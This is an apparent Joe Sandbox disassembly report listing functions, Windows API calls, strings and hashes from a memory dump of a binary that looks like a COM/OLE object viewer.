                                                                          • Instruction Fuzzy Hash: 16619571940218ABDB20BF60EC9AFEE7B79EF55700F0004A8F506AA291CF745A85CF71
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00D3B8DC
                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00D3B8F4
                                                                          • SetCursor.USER32(00000000), ref: 00D3B8FB
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,000F003F,?), ref: 00D3B911
                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00D3B924
                                                                          • SetCursor.USER32(00000000), ref: 00D3B92B
                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00D3B94C
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00D3BAA4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$Load$CloseH_prolog3OpenQueryValue
                                                                          • String ID: AccessPermission$Administrators$CSecurityDescriptor::Initialize failed.$DefaultAccessPermission$DefaultLaunchPermission$Interactive$LaunchPermission$System$new CSecurityDescriptor failed.
                                                                          • API String ID: 2619828013-2246421441
                                                                          • Opcode ID: faf01711d5e1bb4f1478a329f9cd8889d0773d6408a98cefcb1efd77a4b2e2c8
                                                                          • Instruction ID: c25714681bff00d86e19415d18188025e42a0d4cebd4081dc1e26298f29e3324
                                                                          • Opcode Fuzzy Hash: faf01711d5e1bb4f1478a329f9cd8889d0773d6408a98cefcb1efd77a4b2e2c8
                                                                          • Instruction Fuzzy Hash: D4914E75A0021AAFDB119FA0DC89BBEBBB9EF59325F140016FA01E6290DB749D41DF70
                                                                          APIs
                                                                          • __EH_prolog3_GS.LIBCMT ref: 00D2FE6A
                                                                          • #6330.MFC42U(00000001,00000408), ref: 00D2FE73
                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00D2FF2B
                                                                          • SendMessageW.USER32(?,00000148,00000000,?), ref: 00D2FF44
                                                                          • lstrcmpW.KERNEL32(?,None), ref: 00D2FF56
                                                                          • RegDeleteKeyW.ADVAPI32(80000000,00000000), ref: 00D2FFC4
                                                                          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00D3000B
                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00D30067
                                                                          • SendMessageW.USER32(?,00000148,00000000,?), ref: 00D30080
                                                                          • lstrcmpW.KERNEL32(?,None), ref: 00D30092
                                                                          • RegDeleteKeyW.ADVAPI32(80000000,00000000), ref: 00D30111
                                                                          • #4118.MFC42U ref: 00D3011D
                                                                          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00D30135
                                                                          • #540.MFC42U(?,?,00D221A0,DllSurrogate), ref: 00D30192
                                                                          • #3871.MFC42U(?), ref: 00D301A8
                                                                          • RegDeleteKeyW.ADVAPI32(80000000,00000000), ref: 00D301F7
                                                                          • #800.MFC42U(?,TreatAs,?,?), ref: 00D30203
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Delete$lstrcmp$#3871#4118#540#6330#800H_prolog3_
                                                                          • String ID: DllSurrogate$InProcHandler32$InProcServer32$JavaClass$LocalServer32$LocalService$None$ServiceParameters$ThreadingModel$TreatAs$msjava.dll
                                                                          • API String ID: 3854995924-1653547741
                                                                          • Opcode ID: 7cf4942f69f6fbf3b778d540f73bd670950bff368dfc1049ab376854922176a3
                                                                          • Instruction ID: 5acb0aceb4de047f0036f09ee129548117ec0a5962d29ef5dde8cb1106c7be66
                                                                          • Opcode Fuzzy Hash: 7cf4942f69f6fbf3b778d540f73bd670950bff368dfc1049ab376854922176a3
                                                                          • Instruction Fuzzy Hash: 1B916F31540715AEEB11EF24ED87FB73766EF12708F4404A4BE04AF096D6F1AA498BB1
                                                                          APIs
                                                                            • Part of subcall function 00D3D4CD: GetVersionExW.KERNEL32(?), ref: 00D3D4F3
                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2E1E5
                                                                          • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00D2E1F9
                                                                          • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00D2E219
                                                                          • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00D2E242
                                                                          • #6211.MFC42U(00000005,?,?,?), ref: 00D2E259
                                                                          • SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 00D2E268
                                                                          • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00D2E277
                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2E28E
                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2E2A6
                                                                          • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00D2E2BD
                                                                          • SendMessageW.USER32(?,0000133E,00000000,00000001), ref: 00D2E2DE
                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2E30F
                                                                          • SendMessageW.USER32(?,0000133E,00000001,00000001), ref: 00D2E326
                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2E345
                                                                          • SendMessageW.USER32(?,0000133E,00000001,00000001), ref: 00D2E35C
                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2E372
                                                                          • SendMessageW.USER32(?,0000133E,00000001,00000001), ref: 00D2E389
                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2E3A6
                                                                          • SendMessageW.USER32(?,0000133E,00000001,00000001), ref: 00D2E3BD
                                                                          • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00D2E3D0
                                                                          • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 00D2E3EB
                                                                          • RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?), ref: 00D2E3FE
                                                                            • Part of subcall function 00D2E466: SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00D2E482
                                                                            • Part of subcall function 00D2E466: #6211.MFC42U(00000005,?,?,?,?,?,00D2E130,?,?), ref: 00D2E49B
                                                                            • Part of subcall function 00D2E466: SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 00D2E4AA
                                                                            • Part of subcall function 00D2E466: SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2E4BE
                                                                            • Part of subcall function 00D2E466: SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00D2E4ED
                                                                            • Part of subcall function 00D2E466: SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00D2E504
                                                                            • Part of subcall function 00D2E466: SendMessageW.USER32(?,0000133E,00000000,?), ref: 00D2E528
                                                                            • Part of subcall function 00D2E466: SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00D2E53B
                                                                            • Part of subcall function 00D2E466: SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 00D2E555
                                                                            • Part of subcall function 00D2E466: RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,?,00D2E130,?,?), ref: 00D2E569
                                                                            • Part of subcall function 00D2E466: RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,?,00D2E130,?,?), ref: 00D2E578
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$RedrawWindow$#6211$Version
                                                                          • String ID: Access Permissions$Activation$Implementation$Launch Permissions$Registry
                                                                          • API String ID: 3082685337-2693731033
                                                                          • Opcode ID: 8f9e9a88e0cd45b2bb0fc6ad9ba52d83fecf5bff375fc9954721b9538e42e55d
                                                                          • Instruction ID: 7f4437adbc2ff73d8429ca38dbfbc734d9fc4b72223dd0cb30b40cd8ee771873
                                                                          • Opcode Fuzzy Hash: 8f9e9a88e0cd45b2bb0fc6ad9ba52d83fecf5bff375fc9954721b9538e42e55d
                                                                          • Instruction Fuzzy Hash: 53516034500B14BFEB215F21EC4CEAB7BBDFB92705F410418F56A911A0C7B56941CEB0
                                                                          APIs
                                                                          • __EH_prolog3_GS.LIBCMT ref: 00D2C15A
                                                                            • Part of subcall function 00D3D0B6: StringFromGUID2.OLE32(?,?,00000028,?,?,?,?,?,?,?), ref: 00D3D152
                                                                            • Part of subcall function 00D3D0B6: lstrcpyW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00D3D163
                                                                            • Part of subcall function 00D3D0B6: wsprintfW.USER32 ref: 00D3D179
                                                                            • Part of subcall function 00D3D0B6: RegOpenKeyW.ADVAPI32(80000000,CLSID,?), ref: 00D3D1AA
                                                                            • Part of subcall function 00D3D0B6: RegEnumKeyW.ADVAPI32(?,00000000,?,000000FF), ref: 00D3D25C
                                                                            • Part of subcall function 00D3D0B6: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D3D270
                                                                            • Part of subcall function 00D3D0B6: wsprintfW.USER32 ref: 00D3D286
                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00D2C186
                                                                          • SetCursor.USER32(00000000), ref: 00D2C18D
                                                                            • Part of subcall function 00D3DE06: malloc.MSVCRT ref: 00D3DE1E
                                                                          • #538.MFC42U(new CSecurityDescriptor failed.), ref: 00D2C1C8
                                                                          • #800.MFC42U(?,00000008,00000000), ref: 00D2C1E8
                                                                            • Part of subcall function 00D3CDEB: free.MSVCRT ref: 00D3CE45
                                                                            • Part of subcall function 00D3CDEB: free.MSVCRT ref: 00D3CE55
                                                                            • Part of subcall function 00D3CDEB: free.MSVCRT ref: 00D3CE6D
                                                                          • #538.MFC42U(00000000,00000000), ref: 00D2C21A
                                                                          • MakeSelfRelativeSD.ADVAPI32(00000000,00000000,?,?,00000001,?,System,00000001,00000000), ref: 00D2C266
                                                                          • malloc.MSVCRT ref: 00D2C272
                                                                          • #538.MFC42U(00000000), ref: 00D2C29F
                                                                          • MakeSelfRelativeSD.ADVAPI32(00000000,00000000,?), ref: 00D2C2CE
                                                                          • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,000F003F,?), ref: 00D2C313
                                                                          • GetSecurityDescriptorLength.ADVAPI32(?), ref: 00D2C320
                                                                          • RegSetValueExW.ADVAPI32(?,AccessPermission,00000000,00000003,?,00000000), ref: 00D2C336
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00D2C342
                                                                          • free.MSVCRT ref: 00D2C349
                                                                          • #2634.MFC42U(00000001), ref: 00D2C373
                                                                          • #2634.MFC42U(00000001,00000001), ref: 00D2C380
                                                                          • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D2C393
                                                                          • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00D2C3A3
                                                                          • #5977.MFC42U ref: 00D2C3AC
                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00D2C3B7
                                                                          • SetCursor.USER32(00000000), ref: 00D2C3BE
                                                                          Strings
                                                                          • CSecurityDescriptor::Initialize failed., xrefs: 00D2C213
                                                                          • System, xrefs: 00D2C22B
                                                                          • psdSelfRelative malloc failed., xrefs: 00D2C298
                                                                          • new CSecurityDescriptor failed., xrefs: 00D2C1BD
                                                                          • AccessPermission, xrefs: 00D2C32B
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: Cursorfree$#538$#2634CloseLoadMakeMessageOpenRelativeSelfSendmallocwsprintf$#5977#800DescriptorEnumFromH_prolog3_LengthSecurityStringValuelstrcpy
                                                                          • String ID: AccessPermission$CSecurityDescriptor::Initialize failed.$System$new CSecurityDescriptor failed.$psdSelfRelative malloc failed.
                                                                          • API String ID: 3894545846-3913380516
                                                                          • Opcode ID: 501472fbb4061f8f20110003cb2b0f4f21eed1180082447d04787c3c9122a527
                                                                          • Instruction ID: 6e7d98b338f02d5fe7f50b0351b74325b6cc60c61ff01257c7e0c2c2733d5246
                                                                          • Opcode Fuzzy Hash: 501472fbb4061f8f20110003cb2b0f4f21eed1180082447d04787c3c9122a527
                                                                          • Instruction Fuzzy Hash: 20517571940329ABDB21EF60EC8AFEE7B75EF65700F0044A8B505AA291CB745E85CF70
                                                                          APIs
                                                                            • Part of subcall function 00D37980: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00D3798C
                                                                            • Part of subcall function 00D378ED: GetFocus.USER32 ref: 00D378ED
                                                                            • Part of subcall function 00D378ED: #2859.MFC42U(00000000), ref: 00D378F4
                                                                            • Part of subcall function 00D378FA: SendMessageW.USER32(?,0000113E,00000000,00000014), ref: 00D3790C
                                                                          • CLSIDFromString.OLE32(00000000,?,00000100), ref: 00D3312B
                                                                          • wcstok.MSVCRT ref: 00D33191
                                                                          • wcstol.MSVCRT ref: 00D3319A
                                                                          • wcstok.MSVCRT ref: 00D331BA
                                                                          • wcstol.MSVCRT ref: 00D331C3
                                                                          • #1662.MFC42U(Version,00D221A0,?,00000100,00000100), ref: 00D331DE
                                                                          • GetUserDefaultLCID.KERNEL32(Version,00D221A0,?,00000100,00000100), ref: 00D331E3
                                                                          • LoadRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00D3320F
                                                                          • GetSystemDefaultLCID.KERNEL32 ref: 00D33227
                                                                          • LoadRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00D3326D
                                                                          • RegOpenKeyW.ADVAPI32(80000000,TypeLib,?), ref: 00D3329A
                                                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 00D332B5
                                                                          • RegOpenKeyW.ADVAPI32(?,?,?), ref: 00D332CC
                                                                          • RegOpenKeyW.ADVAPI32(?,?,?), ref: 00D332EA
                                                                          • LoadRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00D33330
                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00D33342
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00D3334E
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00D3335A
                                                                          • wsprintfW.USER32 ref: 00D33395
                                                                          • #2644.MFC42U ref: 00D333A4
                                                                          • #538.MFC42U(?), ref: 00D333B6
                                                                          • #800.MFC42U(?,00000000,?), ref: 00D333DB
                                                                          • #2644.MFC42U ref: 00D333E8
                                                                            • Part of subcall function 00D31C95: __EH_prolog3_GS.LIBCMT ref: 00D31C9F
                                                                            • Part of subcall function 00D31C95: StringFromGUID2.OLE32(?,?,00000028,000002BC,00D34FBE,00000000,00D29ECC,?), ref: 00D31CCE
                                                                            • Part of subcall function 00D31C95: wsprintfW.USER32 ref: 00D31CE4
                                                                            • Part of subcall function 00D31C95: RegQueryValueW.ADVAPI32(80000000,?,?,000000A0), ref: 00D31D1A
                                                                            • Part of subcall function 00D31C95: lstrcpyW.KERNEL32(?,<no name>), ref: 00D31D30
                                                                            • Part of subcall function 00D31C95: RegQueryValueW.ADVAPI32(80000000,?,?,000000A0), ref: 00D31D9E
                                                                            • Part of subcall function 00D31C95: RegQueryValueW.ADVAPI32(80000002,?,?,000000A0), ref: 00D31DEE
                                                                            • Part of subcall function 00D31C95: CLSIDFromString.OLE32(?,?), ref: 00D31E06
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: FromString$CloseLoadOpenQueryTypeValue$#2644DefaultMessageSendwcstokwcstolwsprintf$#1662#2859#538#800FocusH_prolog3_SystemUserlstrcpy
                                                                          • String ID: LoadRegTypeLib(%u, %u, %lu, &u ...) failed.$TypeLib$Version
                                                                          • API String ID: 672647845-2616143947
                                                                          • Opcode ID: caeb5d3964a41378b79ea0fa7259f5ed6fab2358e0f344a8a1c15bbf2083e18c
                                                                          • Instruction ID: 803c625c5e44a22d405e07aead33fb59f07edadb53258319312bd40265f9a450
                                                                          • Opcode Fuzzy Hash: caeb5d3964a41378b79ea0fa7259f5ed6fab2358e0f344a8a1c15bbf2083e18c
                                                                          • Instruction Fuzzy Hash: 75C118719042289FDF20AF60DD49BA9B7BAFF95314F0441E9A509E7250DB725EA48F20
                                                                          APIs
                                                                          • #1662.MFC42U(23685920), ref: 00D34CA5
                                                                          • GetUserDefaultLCID.KERNEL32(23685920), ref: 00D34CAA
                                                                          • LoadRegTypeLib.OLEAUT32(-00000008,?,?,?,?), ref: 00D34CDA
                                                                          • GetSystemDefaultLCID.KERNEL32 ref: 00D34CF2
                                                                          • LoadRegTypeLib.OLEAUT32(-00000008,?,?,?,?), ref: 00D34D3C
                                                                          • RegOpenKeyW.ADVAPI32(80000000,TypeLib,?), ref: 00D34D69
                                                                          • StringFromGUID2.OLE32(-00000008,?,00000027), ref: 00D34D84
                                                                          • RegOpenKeyW.ADVAPI32(?,?,?), ref: 00D34D9B
                                                                          • memset.MSVCRT ref: 00D34DB7
                                                                          • wnsprintfW.SHLWAPI ref: 00D34DE0
                                                                          • RegOpenKeyW.ADVAPI32(?,?,?), ref: 00D34DFD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: Open$DefaultLoadType$#1662FromStringSystemUsermemsetwnsprintf
                                                                          • String ID: %u.%u$LoadRegTypeLib(%s, %u, %u, %lu, ...) failed.$TypeLib
                                                                          • API String ID: 2064963674-2378697407
                                                                          • Opcode ID: b82c542a2b4db2d93fbd6a5a6c2248f289e3981eee9389bea3c0b9a6a60dba15
                                                                          • Instruction ID: c44fd9614b51e225faad75f78c1dd15b84603e0b384b470c5d2592fb76626149
                                                                          • Opcode Fuzzy Hash: b82c542a2b4db2d93fbd6a5a6c2248f289e3981eee9389bea3c0b9a6a60dba15
                                                                          • Instruction Fuzzy Hash: 36C106B19002289FDB60DF64DC85BA9B7B8FF05305F0040A5BA49E7251E735AE84DF38
                                                                          APIs
                                                                          • __EH_prolog3_GS.LIBCMT ref: 00D31C9F
                                                                          • StringFromGUID2.OLE32(?,?,00000028,000002BC,00D34FBE,00000000,00D29ECC,?), ref: 00D31CCE
                                                                          • wsprintfW.USER32 ref: 00D31CE4
                                                                          • RegQueryValueW.ADVAPI32(80000000,?,?,000000A0), ref: 00D31D1A
                                                                          • lstrcpyW.KERNEL32(?,<no name>), ref: 00D31D30
                                                                          • RegQueryValueW.ADVAPI32(80000000,?,?,000000A0), ref: 00D31D9E
                                                                          • RegQueryValueW.ADVAPI32(80000002,?,?,000000A0), ref: 00D31DEE
                                                                          • CLSIDFromString.OLE32(?,?), ref: 00D31E06
                                                                          • #540.MFC42U ref: 00D31E18
                                                                          • #2810.MFC42U(?,Could not convert the CLSID of the %s interface viewer.,?), ref: 00D31E33
                                                                          • #800.MFC42U(?,00000000), ref: 00D31E4E
                                                                          • #540.MFC42U ref: 00D31E90
                                                                          • #2859.MFC42U(?,00000001), ref: 00D31EB6
                                                                          • #800.MFC42U(00000000,?,00000001), ref: 00D31ED3
                                                                          • CoCreateInstance.OLE32(?,00000000,00000001,00D21990,?), ref: 00D31EEE
                                                                          • #2810.MFC42U(?,The %s interface viewer failed to load.,?), ref: 00D31F91
                                                                          Strings
                                                                          • Software\Microsoft\IViewers\Interface\%s\OLEViewerIViewerCLSID, xrefs: 00D31DAC
                                                                          • The %s interface viewer failed to load., xrefs: 00D31F8B
                                                                          • Interface\%s\OLEViewerIViewerCLSID, xrefs: 00D31D57
                                                                          • <no name>, xrefs: 00D31D24
                                                                          • Interface\%s, xrefs: 00D31CDE
                                                                          • Could not convert the CLSID of the %s interface viewer., xrefs: 00D31E2D
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue$#2810#540#800FromString$#2859CreateH_prolog3_Instancelstrcpywsprintf
                                                                          • String ID: <no name>$Could not convert the CLSID of the %s interface viewer.$Interface\%s$Interface\%s\OLEViewerIViewerCLSID$Software\Microsoft\IViewers\Interface\%s\OLEViewerIViewerCLSID$The %s interface viewer failed to load.
                                                                          • API String ID: 3373394939-4261977633
                                                                          • Opcode ID: dd57d3d82e7491957c34c7edc508888c6e41433b9336d8eb50527aed8a9e90fd
                                                                          • Instruction ID: e8b46eed2d34ebb8672c274794686731eaa941385193c20cccc9c43e070fa5a5
                                                                          • Opcode Fuzzy Hash: dd57d3d82e7491957c34c7edc508888c6e41433b9336d8eb50527aed8a9e90fd
                                                                          • Instruction Fuzzy Hash: DA81F9769002299FDB61DF50DC89BEEB7B9AF19300F4405A9F949E7250DB309E84CF60
                                                                          APIs
                                                                            • Part of subcall function 00D39137: CoFreeUnusedLibraries.OLE32(00D34689,00000000,?), ref: 00D391A2
                                                                          • #540.MFC42U(23685920,?,?,?,?,00D40AE8,000000FF,?,00D32E44,?,?,00000104), ref: 00D35050
                                                                          • CoGetClassObject.OLE32(000000FC,23685920,00000000,00D29E3C,00000000,23685920,?,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D3507D
                                                                          • CoGetClassObject.OLE32(000000FC,23685920,00000000,00D29E3C,00000000,23685920,?,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D3509D
                                                                          • #860.MFC42U(CoGetClassObject failed.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D350B4
                                                                          • #1262.MFC42U(00000000,CoGetClassObject failed.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D350BC
                                                                          • #860.MFC42U(CoGetClassObject succeeded, but punk was NULL.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D350CF
                                                                          • #1262.MFC42U(00000000,CoGetClassObject succeeded, but punk was NULL.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D350D7
                                                                          • #860.MFC42U(QueryInterface on class factory for IClassFactory failed.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D35118
                                                                          • #1262.MFC42U(00000000,QueryInterface on class factory for IClassFactory failed.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D35120
                                                                          • #860.MFC42U(CoGetClassObject succeeded, but pClassFactory was NULL.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D35136
                                                                          • #1262.MFC42U(00000000,CoGetClassObject succeeded, but pClassFactory was NULL.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D3513E
                                                                          • #860.MFC42U(IClassFactory::CreateInstance failed.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D351A6
                                                                          • #1262.MFC42U(00000000,IClassFactory::CreateInstance failed.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D351AE
                                                                          • #860.MFC42U(IClassFactory::CreateInstance succeeded, but punk was NULL.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D351C4
                                                                          • #1262.MFC42U(00000000,IClassFactory::CreateInstance succeeded, but punk was NULL.,?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D351CC
                                                                          • #800.MFC42U(?,?,?,00D40AE8,000000FF,?,00D32E44,?), ref: 00D35256
                                                                          Strings
                                                                          • IClassFactory::CreateInstance failed., xrefs: 00D3519E
                                                                          • CoGetClassObject failed., xrefs: 00D350AC
                                                                          • IClassFactory::CreateInstance succeeded, but punk was NULL., xrefs: 00D351BC
                                                                          • CoGetClassObject succeeded, but punk was NULL., xrefs: 00D350C7
                                                                          • CoGetClassObject succeeded, but pClassFactory was NULL., xrefs: 00D3512E
                                                                          • QueryInterface on class factory for IClassFactory failed., xrefs: 00D35110
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #1262#860$ClassObject$#540#800FreeLibrariesUnused
                                                                          • String ID: CoGetClassObject failed.$CoGetClassObject succeeded, but pClassFactory was NULL.$CoGetClassObject succeeded, but punk was NULL.$IClassFactory::CreateInstance failed.$IClassFactory::CreateInstance succeeded, but punk was NULL.$QueryInterface on class factory for IClassFactory failed.
                                                                          • API String ID: 3706085179-577247013
                                                                          • Opcode ID: b5e92e6719fac298f077fdbadcdbf66d563a51e9119cede6e93b114e5dac2009
                                                                          • Instruction ID: 32b93ab4a403e97538b30dfab0ddce600e97278dc542b584927d8c291717608f
                                                                          • Opcode Fuzzy Hash: b5e92e6719fac298f077fdbadcdbf66d563a51e9119cede6e93b114e5dac2009
                                                                          • Instruction Fuzzy Hash: C471AE75D01209EFCB10EFA8E98ABAEBBB4FF18315F104125E911B72A1D7759A44CB70
                                                                          APIs
                                                                          • #4704.MFC42U ref: 00D2D024
                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00D2D030
                                                                          • SetCursor.USER32(00000000), ref: 00D2D037
                                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 00D2D06F
                                                                          • SendMessageW.USER32(?,00001061,00000001,?), ref: 00D2D0A0
                                                                          • RegOpenKeyW.ADVAPI32(80000000,CLSID,?), ref: 00D2D0B3
                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000100), ref: 00D2D0D0
                                                                          • wsprintfW.USER32 ref: 00D2D0F8
                                                                          • lstrcpyW.KERNEL32(?,00D22948,80000000,?,00D221A0,?,000001FE), ref: 00D2D13F
                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00D2D18E
                                                                          • SendMessageW.USER32(?,00001053,000000FF,00000002), ref: 00D2D1BE
                                                                          • SendMessageW.USER32(?,0000104C,00000000,00000001), ref: 00D2D1F3
                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00D2D205
                                                                          • SetCursor.USER32(00000000), ref: 00D2D20C
